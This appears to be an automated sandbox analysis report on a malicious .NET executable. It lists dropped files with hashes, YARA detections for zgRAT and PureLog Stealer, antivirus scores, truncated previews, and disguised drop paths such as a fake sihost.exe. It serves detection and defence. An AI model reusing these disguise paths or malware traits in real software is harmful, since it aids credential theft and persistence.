gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer
CPNSQusnwC.exe | malicious | DCRat
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (780), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):780
                                                          Entropy (8bit):5.8921956402753715
                                                          Encrypted:false
                                                          SSDEEP:12:HFho3F70O8s0TU3a2Rw5TREoHMs2FN0YtODspz9N0YS83dmBVAZGKMxQvv0f:Hc/4U3a2e9xs9VYDgz9A83dKVKwmXm
                                                          MD5:8FDC8D9DDD983DE21512D4DEA164585E
                                                          SHA1:37B700382CC183BEB1F018CCB5D30A0D7932F32F
                                                          SHA-256:EA8C198B9F6B903BEA2C3EE999A5D0B121A8CB553A206C6FFF4C9A99068B7BC5
                                                          SHA-512:62E11EE190126C8BEFBA215B00F87F4901A9F48E7C051258DBC1A648DC55B4005DCC0D252BF4CA57F6B1F9CA2ECEECD1AB3764A099E0242BD1392C7039E1B062
                                                          Malicious:false
Preview:
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (611), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):611
                                                          Entropy (8bit):5.873529907204493
                                                          Encrypted:false
                                                          SSDEEP:12:+mTuwWxXsqEbfrjsuvk8akI3WeXGy+y5Vz6ODoSw2dDARBBg9u:+Eu7Xs5ns0C3XGiPz6Xd54u
                                                          MD5:8915B7FA8C6C22C77B62317580FA116B
                                                          SHA1:627C9E4B26A3F5D96737324193D2ED8CE3628445
                                                          SHA-256:78304BEE8A0CF11CCE7AA71EF36E5243000EE93A2C86EE6E818FA23489FAF70A
                                                          SHA-512:FFB88EFDD188F1C3A9E35180A09B4F9A200B190EF5F9A2CDA5143A7C0F676DDF233586E7BF1C5DEE94D9FAD4FBA2EDD1E9B48F4B3EB5C491D6A7C73451DF693A
                                                          Malicious:false
                                                          Preview:N3W2Ot1reb8a4mKkOPfSkZVtnqdqVE6hgUhE6kgMiIOMGJwJ7euZp3BxhmPhPLWZeb4kEGonsTubKJnd4Us0Uh2nTtgTU96WwyroPME1zGqVIkmY8wn4dfF6jRRUkUTtWXpWb9OrP0BN0getGHUiVC3QtvE75uRfx79v4Q69h6pme1FDxhNc9vXUdYnq5Qwfifa3gsy0LVAZWRv1pAKXhzfCkpRfnQERJKD8bMgEtXQnu77MnvB4FY7tAYS1bSM5RsPMNwZceGnJi1RmrE21OJLuMU8D3pmbKVWCsu90Wia8vxKIGqKWZVqHgfA3xWiydM9MfP47FBfqtN9YJz6NfQBzpOfNuFC99leiy7n1wMRYz9XTfmt8aVTNLKhQuqM98grIsbkLMEaS8m9p0LrIWEinRRWnaXHFARZTSPlEBivV5BOiL1Zi8En37D1aE6vy7USqNpXlknGySMsPCycj8jG5ofWPYK9Fw7YkthVfdx8V8zluUlYQdMzXNWCsSINZoABVxIfec7FKkv6z4m4wwtmkHAWWfnNVkiq8yP6LG3xgHpxcaNxqNan5XaNwwI9zttkBE8Aopsq25GdcN36SzgIJ5vkXBJZ747w
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):155
                                                          Entropy (8bit):5.562491567694741
                                                          Encrypted:false
                                                          SSDEEP:3:JQ5MPoJK2GirCLE2E3+A6yTCjvHYkRevE53IKTyAU0zQlKxyGIX7jHY1tfn:+c5UIfMa8CjLUsmCtVzQlKUfX7jOtf
                                                          MD5:738151E13F8E1BE31D29C42956977DE9
                                                          SHA1:182BCF64C61927BFACDE3706C87F9F1238CB04BA
                                                          SHA-256:649A72D39B47626493434C0EC16B495F9D98095164AC468268C68D4B4804BD13
                                                          SHA-512:050E56E0A9E55CF61F061720966E263C0B77502D0CC58356A05662FFC205D26DB572E4E0E71C7A3C38A1D44FF2D35C0872F4946CF7ADA8AD25A000BDE60F0DDA
                                                          Malicious:false
                                                          Preview:Aeuu9R7vj2LqAMlaFSYnmfTt87TFXbgfGqgnZLwSaQkgvN7jwoqEDigeLBvB71XHWqkUq7A4gFMW5w7uAuTtvbchJBcYZuVj3dKFnm3ynwi7WKjYDBBNhoV5ODKofmewunccm2HY1fG93eK9cDVYsHBPHP0
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005753878328145
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                          Malicious:false
                                                          Preview:@...e................................................@..........
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 31 03:10:16 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1952
                                                          Entropy (8bit):4.54879697430445
                                                          Encrypted:false
                                                          SSDEEP:24:HFZbW97OEtteDfH/wKTFVoXN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:JatEoKTfoXyluOulajfqXSfbNtmh5Z
                                                          MD5:83DEC8F327A509A6D81DE622B95007C8
                                                          SHA1:EDEE8202BDE0653C2993531A1AF831A871D365B2
                                                          SHA-256:C86C9478BD1A239054893B1460ED80C63D2C57D69F85248CCD5918E0F14BBA00
                                                          SHA-512:62E5B77A28A83ECC4542D1ED98D655FC14EC041CA202C62F7005C1E4075741059944A19FA9B2DB32F4DBC0EFE04015BA1E82C70ACB3EE7DDEEB97C24AE835C52
                                                          Malicious:false
                                                          Preview:L....`sg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESC076.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\fontdriversavescrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
